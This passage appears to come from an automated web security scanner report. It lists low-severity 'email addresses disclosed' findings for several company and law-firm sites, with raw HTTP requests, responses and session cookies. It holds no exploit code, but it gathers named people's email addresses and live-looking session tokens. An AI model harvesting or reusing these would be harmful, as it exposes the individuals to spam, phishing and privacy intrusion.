Date: Thu, 12 May 2011 12:39:33 GMT
Content-Length: 30197

//##############################
// jQuery Custom Radio-buttons and Checkbox; basically it's styling/theming for Checkbox and Radiobutton elements in forms
// By Dharmavirsinh Jhala - dharmavir@gmail.com
// Date of Release: 13th March 10
// Version: 0.8
/*
USAGE:
   $(document).ready(function(){
       $(":radio").behaveLikeCheckbox();
   }
*/

var elmHeight = "35";    // should be specified based on i
...[SNIP]...

22.62. http://www.mimecast.com/Scripts/jquery.colorbox.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /Scripts/jquery.colorbox.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/jquery.colorbox.min.js HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/About-us/Contact-us/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 30 Dec 2010 12:44:49 GMT
Accept-Ranges: bytes
ETag: "80f65a581fa8cb1:0"
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:37:53 GMT
Content-Length: 9029

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",
...[SNIP]...

22.63. http://www.mimecast.com/Templates/Pages/images/icons/desktop.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /Templates/Pages/images/icons/desktop.png

Issue detail

The following email address was disclosed in the response:

Request

GET /Templates/Pages/images/icons/desktop.png HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/How-to-buy/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.5.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=303c07d-12fe4358101-13064b3c-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:37 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:37 GMT
Content-Length: 23734

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Mimecast</title>


<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
       <meta name="viewport" con
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.64. http://www.mimecast.com/What-we-offer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /What-we-offer/

Issue detail

The following email address was disclosed in the response:

Request

GET /What-we-offer/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:50 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:50 GMT; path=/
Date: Thu, 12 May 2011 12:37:50 GMT
Content-Length: 66702

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Email Management & Email Compliance Solutions and more</title>
<META NAME="DESCRIPTION" CONTENT="Mimecast offers e
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.65. http://www.moritthock.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_visit=989860894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
Set-Cookie: exp_last_activity=1305220894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:21:34 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff LLP A
...[SNIP]...

22.66. http://www.opalgroup.net/conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opalgroup.net
Path:   /conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php

Issue detail

The following email address was disclosed in the response:

Request

GET /conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php HTTP/1.1
Host: www.opalgroup.net
Proxy-Connection: keep-alive
Referer: http://www.opalgroup.net/google/ais2010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:01:17 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:info@opalgroup.net" target="_blank"> info@opalgroup.net</a>
...[SNIP]...

22.67. https://www.opalgroup.net/js/chainedselects.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.opalgroup.net
Path:   /js/chainedselects.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/chainedselects.js HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: https://www.opalgroup.net/forms/register/register.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:47 GMT
Server: Apache/2.2.6 (Unix)
Last-Modified: Tue, 15 Mar 2011 16:51:03 GMT
ETag: "408186-19b0-3bceebc0"
Accept-Ranges: bytes
Content-Length: 6576
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

// Chained Selects

// Copyright Xin Yang 2004
// Web Site: www.yxScripts.com
// EMail: m_yangxin@hotmail.com
// Last Updated: 2004-08-23

// This script is free as long as the copyright notice remains intact.

var _disable_empty_list=false;
var _hide_empty_list=false;

// ------
if (typeof(disable_empty_list
...[SNIP]...

22.68. http://www.pepperlaw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pepperlaw.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nh0wgw55jxz1ajufvrh0mnva; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:02:59 GMT
Content-Length: 14391


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Law Firm Of Pe
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.69. http://www.pepperlaw.com/contact.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pepperlaw.com
Path:   /contact.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/ourlawyers.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=3; __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.3.10.1305201782

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:04:01 GMT
Content-Length: 25427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com">phinfo@pepperlaw.com</a>
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.70. http://www.pepperlaw.com/contact_Comments.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pepperlaw.com
Path:   /contact_Comments.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact_Comments.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/contact.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=3; __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.5.10.1305201782

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:04:51 GMT
Content-Length: 10453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:austinj@pepperlaw.com">austinj@pepperlaw.com</a>
...[SNIP]...
<a href="mailto:sparksn@pepperlaw.com">sparksn@pepperlaw.com</a>
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.71. http://www.pepperlaw.com/ourlawyers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pepperlaw.com
Path:   /ourlawyers.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ourlawyers.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/publications.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=3; __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.2.10.1305201782

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:03:59 GMT
Content-Length: 76849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.72. http://www.pepperlaw.com/publications.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pepperlaw.com
Path:   /publications.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /publications.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.1.10.1305201782; fcspersistslider1=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:03:50 GMT
Content-Length: 100892


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.73. http://www.pillsburylaw.com/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /index.cfm?pageid=12&itemid=1908 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.1.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<a href="mailto:deborah.thorenpeden@pillsburylaw.com">deborah.thorenpeden@pillsburylaw.com</a>
...[SNIP]...

22.74. http://www.pillsburylaw.com/scripts/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery.cookie.js HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.1.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Length: 4028
Content-Type: application/x-javascript
Content-Location: http://www.pillsburylaw.com/scripts/jquery.cookie.js
Last-Modified: Thu, 28 Aug 2008 22:10:55 GMT
Accept-Ranges: bytes
ETag: "2f547f15a9c91:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:31:40 GMT

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.75. http://www.pillsburylaw.com/scripts/jquery.dimensions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /scripts/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /scripts/jquery.dimensions.js HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response

HTTP/1.1 200 OK
Content-Length: 2525
Content-Type: application/x-javascript
Content-Location: http://www.pillsburylaw.com/scripts/jquery.dimensions.js
Last-Modified: Wed, 16 Apr 2008 15:17:28 GMT
Accept-Ranges: bytes
ETag: "caa48dfbd49fc81:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:22:05 GMT

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $Las
...[SNIP]...

22.76. http://www.pomerantzlaw.com/attorneys.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /attorneys.html

Issue detail

The following email address was disclosed in the response:

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=24 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.3.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<a href="mailto:chamer@pomlaw.com">chamer@pomlaw.com</a>
...[SNIP]...

22.77. http://www.pomerantzlaw.com/attorneys.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /attorneys.html

Issue detail

The following email address was disclosed in the response:

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=15 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.5.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:55:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 9647


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<a href="mailto:sjweiswasser@pomlaw.com">sjweiswasser@pomlaw.com</a>
...[SNIP]...

22.78. http://www.pomerantzlaw.com/cases.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
